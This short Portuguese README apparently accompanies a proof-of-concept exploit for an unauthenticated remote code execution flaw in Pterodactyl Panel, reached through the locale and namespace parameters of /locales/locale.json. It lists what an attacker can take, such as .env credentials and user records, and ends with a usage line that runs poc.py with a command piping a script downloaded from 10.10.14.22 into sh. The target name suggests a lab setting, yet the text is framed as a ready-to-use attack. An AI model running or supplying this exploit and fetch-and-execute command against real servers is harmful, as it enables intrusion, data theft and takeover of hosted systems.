
A falha permite que um invasor execute comandos arbitrários do sistema no servidor que hospeda o Painel Pterodactyl sem qualquer autenticação prévia.
Impacto
Usando o /locales/locale.json com os parâmetros de consulta locale e namespace, um ator malicioso é capaz de executar código arbitrário, sem estar autenticado.
Com a capacidade de executar código arbitrário, esta vulnerabilidade pode ser explorada de inúmeras maneiras. Poderia ser usada para obter acesso ao servidor do Painel, ler credenciais da configuração do Painel (.env ou outros), extrair informações sensíveis do banco de dados (como detalhes do usuário [nome de usuário, email, nome e sobrenome, senha com hash, endereços IP, etc]), acessar arquivos de servidores gerenciados pelo painel, etc.
Como usar
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'